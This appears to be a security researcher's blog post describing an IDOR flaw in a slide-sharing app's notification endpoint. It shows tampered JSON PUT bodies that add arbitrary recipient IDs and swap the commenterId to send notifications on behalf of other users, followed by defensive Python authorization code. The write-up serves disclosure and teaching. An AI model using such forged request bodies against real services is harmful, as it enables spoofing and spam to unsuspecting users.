cat ~/footstep.ninja/blog.txt

where I share my findings and whatnot

Story of an IDOR via HTTP

Oh! Yeah, HTTP is the most common channel where you could find an Insecure Direct Object Reference (IDOR) vulnerability (IMO). I should call this an IDOR series, hahah!

In my last post, I mentioned there was a vulnerable HTTP PUT request on the target. The request was meant to send a notification to other members of a team about a comment. The same endpoint was also used to notify other users when a slide is shared with them. And both happened to be vulnerable to IDOR!

What could we do?

  1. Notify users they have been shared a deck
  2. Notify users about a comment
  3. Send comment notification on behalf of another user
  4. HTML Injection (I’ll discuss this in another post to keep things organized!)

Do you believe that?

Notify users they have been shared a deck

The body of the PUT request for sharing a deck looks like the following:

{"recipients":[{"type":"User","id":"12345678"}],"teamAlias":"EEqSBdu9z49","data":{"presentationUUID":"x14r5K1tFnH","comment":"Good stuff","senderProfileImage":"","text":"shared a deck"},"type":"DeckShare"}

Could you identify the vulnerable parameter?

Yes, the id within the recipients parameter. And I could send the same notification to every other user by adding more users to the array, which looks like the following:

{"recipients":[{"type":"User","id":"12345678"},{"type":"User","id":"12345679"},{"type":"User","id":"12345670"}],"teamAlias":"EEqSBdu9z49","data":{"presentationUUID":"x14r5K1tFnH","comment":"Good stuff","senderProfileImage":"","text":"shared a deck"},"type":"DeckShare"}

Notify users about a comment

And for a comment notification, it looked like this:

{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"","slideLocalId":"5p3nrib"}}

Here, apart from the commenterId, what else do you notice?

Oh! Yes, the recipients. It was an empty array, but adding users to it, just like in the shared-deck notification above, works. The body now looks like the following:

{"type":"SlideComment","recipients":[{"type":"User","id":"12345678"},{"type":"User","id":"12345679"},{"type":"User","id":"12345670"}],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"","slideLocalId":"5p3nrib"}}

Send comment notification on behalf of another user

Also, the obvious commenterId in the previous body could be replaced with the id of any other user. And then one is able to notify users about a comment on behalf of another user.
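
What the server side would need to check for both the recipients and commenterId issues, as an added example (not code from the target or from this post). TEAMS, DECK_TEAM and authorize_notification are hypothetical names, the data is constructed, and the rule that recipients must belong to the caller's team is an assumed policy:

```python
# Added example: authorization for the notification body shown in the post.
# All names and data below are hypothetical / constructed for illustration.

TEAMS = {"EEqSBdu9z49": {"01234567", "12345678"}}  # teamAlias -> member ids
DECK_TEAM = {"x14r5K1tFnH": "EEqSBdu9z49"}         # presentationUUID -> owning team


class Forbidden(Exception):
    """Raised when the caller is not allowed to send this notification."""


def authorize_notification(session_user_id, body):
    """Return a sanitized copy of body, or raise Forbidden.

    session_user_id must come from the authenticated session, never the body.
    """
    team = body.get("teamAlias")
    members = TEAMS.get(team, set())
    if session_user_id not in members:
        raise Forbidden("caller is not a member of teamAlias")

    data = dict(body.get("data", {}))  # copy so the input is not mutated
    if DECK_TEAM.get(data.get("presentationUUID")) != team:
        raise Forbidden("presentation does not belong to this team")

    # Every recipient id is an object reference and is checked individually.
    for r in body.get("recipients", []):
        if r.get("type") != "User" or r.get("id") not in members:
            raise Forbidden(f"recipient {r.get('id')!r} is outside the team")

    if body.get("type") == "SlideComment":
        # Ignore the client-supplied commenterId; use the session identity.
        data["commenterId"] = session_user_id
    return {**body, "data": data}


if __name__ == "__main__":
    # Constructed request: one recipient id that is not in the caller's team.
    forged = {"type": "DeckShare", "teamAlias": "EEqSBdu9z49",
              "recipients": [{"type": "User", "id": "12345679"}],
              "data": {"presentationUUID": "x14r5K1tFnH"}}
    try:
        authorize_notification("01234567", forged)
    except Forbidden as exc:
        print("rejected:", exc)
```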

Hope you're convinced

Thank you for your time. And I hope you enjoyed reading this.
